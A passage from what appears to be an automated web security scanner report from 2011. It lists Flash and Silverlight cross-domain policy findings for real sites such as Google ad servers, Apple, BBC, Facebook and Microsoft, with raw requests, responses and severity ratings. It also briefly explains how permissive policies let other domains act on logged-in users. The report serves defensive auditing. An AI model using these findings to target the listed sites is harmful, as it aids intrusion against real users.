   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.31. http://googleads.g.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Wed, 20 Jul 2011 20:22:21 GMT
Expires: Thu, 21 Jul 2011 20:22:21 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 70890

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.32. http://images.apple.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://images.apple.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: images.apple.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 02 Jun 2005 16:16:28 GMT
ETag: "8d-3f8918f48ef00"
X-Cached-Time: Wed, 20 Jul 2011 20:45:03 GMT
Server: Apache/2.2.14 (Unix)
Content-Length: 141
Content-Type: application/xml
Cache-Control: max-age=586
Expires: Thu, 21 Jul 2011 20:41:39 GMT
Date: Thu, 21 Jul 2011 20:31:53 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="wdirect.apple.com" />
<allow-access-from domain="*.apple.com" />
</cross-domain-policy>

4.33. http://mm.chitika.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://mm.chitika.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: mm.chitika.net

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:23:51 GMT
Server: Apache
Last-Modified: Mon, 02 Jun 2008 19:48:27 GMT
ETag: "35d0385-23d-44eb4477878c0"
Accept-Ranges: bytes
Content-Length: 573
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="vip.unitedsites.com.ar" />
   <allow-access-from domain="*.unitedsites.com.ar" />
   <allow-access-from domain="*.shleper.net" />
   <allow-access-from domain="*.shoshkeles.com" />
   <allow-access-from domain="*.unitedvirtualities.com" />
   <allow-access-from domain="*.akamai.net" />
   <allow-access-from domain="*.chitika.com" />
   <allow-access-from domain="*.chitika.net" />
<allow-access-from domain="208.78.43.149" />
<allow-access-from domain="*.2c-studio.com" />
...[SNIP]...

4.34. http://newsrss.bbc.co.uk/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://newsrss.bbc.co.uk
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Server: Apache
Content-Type: text/xml
Cache-Control: max-age=9
Expires: Thu, 21 Jul 2011 16:03:27 GMT
Date: Thu, 21 Jul 2011 16:03:18 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.35. http://pagead2.googlesyndication.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pagead2.googlesyndication.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Wed, 20 Jul 2011 20:22:59 GMT
Expires: Thu, 21 Jul 2011 20:22:59 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 71384

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.36. http://pubads.g.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pubads.g.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Thu, 21 Jul 2011 11:13:02 GMT
Expires: Fri, 22 Jul 2011 11:13:02 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 17979
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.37. http://static.ak.fbcdn.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.138.64.184
Date: Thu, 21 Jul 2011 16:21:20 GMT
Content-Length: 1527
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

4.38. http://www.apple.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.apple.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apple.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 02 Jun 2005 16:16:28 GMT
ETag: "8d-3f8918f48ef00"
Server: Apache/2.2.14 (Unix)
X-N: S
X-Cached-Time: Mon, 21 Mar 2011 16:49:30 GMT
nnCoection: close
Content-Type: application/xml
Content-Length: 141
Cache-Control: max-age=206
Expires: Thu, 21 Jul 2011 20:28:22 GMT
Date: Thu, 21 Jul 2011 20:24:56 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="wdirect.apple.com" />
<allow-access-from domain="*.apple.com" />
</cross-domain-policy>

4.39. http://www.disqus.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.disqus.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.disqus.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:24:21 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Length: 244
Connection: close
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.usopen.org" to-ports="80,96" secure="false" />
...[SNIP]...

4.40. http://www.facebook.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.64.124.60
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

4.41. http://www.scmagazineus.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.scmagazineus.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.scmagazineus.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 21 Sep 2009 15:39:52 GMT
Accept-Ranges: bytes
ETag: "6cd10c3d13aca1:0"
Server: Microsoft-IIS/7.5
From: VM-Web1
X-Powered-By: ASP.NET
Date: Fri, 22 Jul 2011 20:13:11 GMT
Connection: close
Content-Length: 292

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.google-analytics.com"/>
...[SNIP]...

5. Silverlight cross-domain policy previous next
There are 9 instances of this issue:

http://ad.doubleclick.net/clientaccesspolicy.xml
http://clk.atdmt.com/clientaccesspolicy.xml
http://haymarketbusinesspublications.122.2o7.net/clientaccesspolicy.xml
http://metrics.apple.com/clientaccesspolicy.xml
http://rad.msn.com/clientaccesspolicy.xml
http://secure-us.imrworldwide.com/clientaccesspolicy.xml
http://i.microsoft.com/clientaccesspolicy.xml
http://i3.microsoft.com/clientaccesspolicy.xml
http://www.microsoft.com/clientaccesspolicy.xml

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

5.1. http://ad.doubleclick.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 20:54:04 GMT
Date: Thu, 21 Jul 2011 16:13:59 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.2. http://clk.atdmt.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://clk.atdmt.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: clk.atdmt.com

Response

HTTP/1.1 200 OK
Content-Length: 312
Content-Type: text/xml
Date: Thu, 21 Jul 2011 17:36:10 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.3. http://haymarketbusinesspublications.122.2o7.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://haymarketbusinesspublications.122.2o7.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: haymarketbusinesspublications.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:14:05 GMT
Server: Omniture DC/2.0.0
xserver: www333
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.4. http://metrics.apple.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.apple.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.apple.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 20:25:07 GMT
Server: Omniture DC/2.0.0
xserver: www647
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.5. http://rad.msn.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rad.msn.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: rad.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/xml
Last-Modified: Fri, 13 May 2011 05:32:00 GMT
Accept-Ranges: bytes
ETag: "088fa142f11cc1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Thu, 21 Jul 2011 20:05:09 GMT
Connection: keep-alive
Content-Length: 337

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<gran
...[SNIP]...

5.6. http://secure-us.imrworldwide.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secure-us.imrworldwide.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Jul 2011 16:12:55 GMT
Content-Type: text/xml
Content-Length: 255
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
Connection: close
Expires: Thu, 28 Jul 2011 16:12:55 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

5.7. http://i.microsoft.com/clientaccesspolicy.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i.microsoft.com
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: i.microsoft.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 12 May 2009 23:10:10 GMT
ETag: "c4640cc56d3c91:0"
Server: Microsoft-IIS/7.5
VTag: 279350742100000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Cache-Control: max-age=900
Date: Thu, 21 Jul 2011 20:05:06 GMT
Content-Length: 572
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from >
<domain uri="http://www.microsoft.com"/>
<domain uri="http://i.mic
...[SNIP]...
<domain uri="http://i2.microsoft.com"/>
<domain uri="http://i3.microsoft.com"/>
<domain uri="http://i4.microsoft.com"/>
<domain uri="http://img.microsoft.com"/>
...[SNIP]...

5.8. http://i3.microsoft.com/clientaccesspolicy.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i3.microsoft.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: i3.microsoft.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 12 May 2009 23:10:10 GMT
ETag: "c4640cc56d3c91:0"
Server: Microsoft-IIS/7.5
VTag: 279350742100000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Cache-Control: max-age=885
Date: Thu, 21 Jul 2011 20:05:21 GMT
Content-Length: 572
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from >
<domain uri="http://www.microsoft.com"/>
<domain uri="http://i.microsoft.com"/>
<domain uri="http://i2.microsoft.com"/>
...[SNIP]...
<domain uri="http://i4.microsoft.com"/>
<domain uri="http://img.microsoft.com"/>
...[SNIP]...

5.9. http://www.microsoft.com/clientaccesspolicy.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.microsoft.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Type: text/xml
Last-Modified: Tue, 12 May 2009 23:10:10 GMT
Accept-Ranges: bytes
ETag: "c4640cc56d3c91:0"
Server: Microsoft-IIS/7.5
VTag: 2796742500000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Thu, 21 Jul 2011 17:35:16 GMT
Connection: keep-alive
Content-Length: 572

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from >
<domain uri="http://www.microsoft.com"/>
<domain uri="http://i.microsoft.com"/>
<domain uri="http://i2.microsoft.com"/>
<domain uri="http://i3.microsoft.com"/>
<domain uri="http://i4.microsoft.com"/>
<domain uri="http://img.microsoft.com"/>
...[SNIP]...

6. Cleartext submission of password previous next
There are 5 instances of this issue:

http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js
http://forums.vostu.com/
http://forums.vostu.com/forums/41-Como-Jogar
http://static.curse.com/themes/common/v6/scripts/core.js
http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/

Issue background

